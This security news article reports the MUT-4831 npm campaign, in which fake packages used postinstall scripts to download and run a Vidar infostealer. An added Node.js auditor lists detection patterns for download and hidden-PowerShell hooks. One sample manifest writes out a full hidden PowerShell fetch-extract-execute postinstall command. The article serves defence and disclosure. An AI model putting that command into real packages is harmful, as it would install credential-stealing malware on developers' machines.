Datadog Security Research has uncovered a sophisticated supply chain attack targeting the npm ecosystem, involving 17 malicious packages across 23 releases designed to deliver the Vidar infostealer malware to Windows systems.
The campaign, attributed to a threat actor cluster tracked as MUT-4831, represents a significant escalation in npm-based threats and marks the first known public disclosure of Vidar malware being distributed through npm packages.
The malicious packages masquerade as legitimate software development kits and libraries, including fake Telegram bot helpers, icon libraries, and forked versions of popular projects like Cursor and React.
Despite their benign presentation on the npm registry, these packages execute destructive payloads through postinstall scripts that automatically run during installation.

Researchers discovered that the packages remained live on the npm registry for approximately two weeks before removal, during which they accumulated at least 2,240 downloads. The most popular malicious package, react-icon-pkg, was downloaded 503 times before being taken down.
The Discovery and Initial Attack Chain
Security researchers at Datadog detected the campaign on October 21, 2025, using GuardDog, their command-line static analyzer for identifying suspicious signatures in package code.
The initial detection flagged the package [email protected], revealing multiple malicious indicators, including silent process execution, suspicious network domains, and automatic installation scripts.
Researchers observed the packages being published in two bursts in late October by two npm accounts, “aartje” and “saliii229911,” operated by the threat actors behind the campaign.

The attack chain follows a straightforward three-step process executed during package installation. First, the postinstall script downloads an encrypted ZIP archive from a bullethost[.]cloud domain.
Second, the script decrypts and extracts the archive using hardcoded passwords. Third, it executes a Windows PE binary named bridle.exe from the extracted contents before performing cleanup operations.
Some variations of the campaign employed PowerShell scripts embedded directly in package.json files, suggesting the threat actors deliberately diversified their implementations to evade detection mechanisms.
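As an added illustration (not code from the original article, from Datadog, or from GuardDog), the following Node.js snippet audits a package.json for lifecycle hooks that match the chain described above: a remote fetch, archive extraction, launch of a .exe, and cleanup. The rules, package names and download domain are constructed for the example; only the binary name bridle.exe comes from the report.

```javascript
// Added example (not Datadog's or GuardDog's code): flag npm lifecycle hooks that
// match the chain above: remote fetch, archive extraction, .exe launch, cleanup.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Each rule pairs an indicator label with a case-insensitive pattern over the script text.
const RULES = [
  ['remote-download', /\b(curl|wget|Invoke-WebRequest|iwr|DownloadFile|DownloadString)\b|https?:\/\//i],
  ['powershell', /\b(powershell|pwsh)\b/i],
  ['hidden-window', /-(w|windowstyle)\s+hidden|-nop\b|-noprofile\b|-(ep|executionpolicy)\s+bypass/i],
  ['archive-extract', /\b(unzip|Expand-Archive|7z|tar)\b|\.zip\b/i],
  ['exe-execution', /\b[\w.-]+\.exe\b|\bstart-process\b/i],
  ['cleanup', /\b(rm\s+-rf|del\s+\/[fq]|Remove-Item)\b/i],
];

// Returns { name, risk, findings }; findings lists the indicators hit per lifecycle hook.
function auditPackageJson(pkg) {
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const indicators = RULES.filter(([, re]) => re.test(cmd)).map(([label]) => label);
    if (indicators.length) findings.push({ hook, indicators });
  }
  const hit = new Set(findings.flatMap((f) => f.indicators));
  // Any network fetch or PowerShell in a hook is suspicious; a fetch combined with
  // PowerShell or a .exe launch reproduces the MUT-4831 shape and is rated high.
  let risk = findings.length ? 'low' : 'none';
  if (hit.has('remote-download') || hit.has('powershell')) risk = 'medium';
  if (hit.has('remote-download') && (hit.has('exe-execution') || hit.has('powershell'))) risk = 'high';
  return { name: pkg.name, risk, findings };
}

// Constructed manifest imitating the described postinstall chain (placeholder domain,
// not the real package); the binary name bridle.exe is the one reported above.
const SUSPICIOUS_PKG = {
  name: 'example-icon-pkg',
  scripts: {
    postinstall:
      'powershell -w hidden -c "iwr https://download.example.invalid/a.zip -OutFile a.zip; ' +
      'Expand-Archive a.zip .; Start-Process .\\bridle.exe; Remove-Item a.zip"',
  },
};

// Constructed manifest with an ordinary local postinstall step for comparison.
const BENIGN_PKG = {
  name: 'example-clean',
  scripts: { build: 'tsc -p .', test: 'node --test', postinstall: 'node scripts/patch-types.js' },
};
console.log(JSON.stringify(auditPackageJson(SUSPICIOUS_PKG)), auditPackageJson(BENIGN_PKG).risk);
```

Run it against an installed dependency tree by reading each node_modules/*/package.json; a "high" result is a reason to block the install and inspect the hook, not proof of compromise.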
Vidar Infostealer: The Second-Stage Payload
The extracted executable in every malicious package proved to be a Vidar v2 infostealer, a Go-compiled variant of the notorious information stealer that first emerged in 2018 as an evolution of the earlier Arkei trojan.
Unlike traditional Vidar samples written in C/C++, this variant represents a new generation of the malware with enhanced capabilities for compromising victim systems.

Once executed, Vidar aggressively harvests sensitive data including browser credentials, cookies, cryptocurrency wallets, and critical system files, then packages the stolen information into ZIP archives for exfiltration to command-and-control servers.
What distinguishes this Vidar variant is its infrastructure discovery mechanism, which relies on hardcoded Telegram and Steam accounts to retrieve active C2 domains dynamically.
The malware queries these social media profiles to discover which infrastructure is currently operational, allowing threat actors to rotate their command-and-control servers without requiring package updates.
Upon successful data theft, Vidar deletes all traces of itself from the victim system, significantly complicating post-compromise detection and incident response efforts for security teams.
The MUT-4831 campaign underscores the persistent vulnerability of open source package ecosystems to supply chain exploitation.
Both threat actor accounts were newly created and operated for only days before publication, indicating deliberate infrastructure setup specifically for this attack. Following discovery, npm permanently banned both accounts and removed all associated packages, though not before the malware reached hundreds of systems.
The campaign demonstrates that threat actors have learned npm provides a reliable initial access vector for delivering malware to millions of downstream users with minimal friction.
Datadog’s Supply-Chain Firewall technology offers one mitigation approach by blocking known-malicious packages before installation, potentially preventing costly incident response cycles before they begin.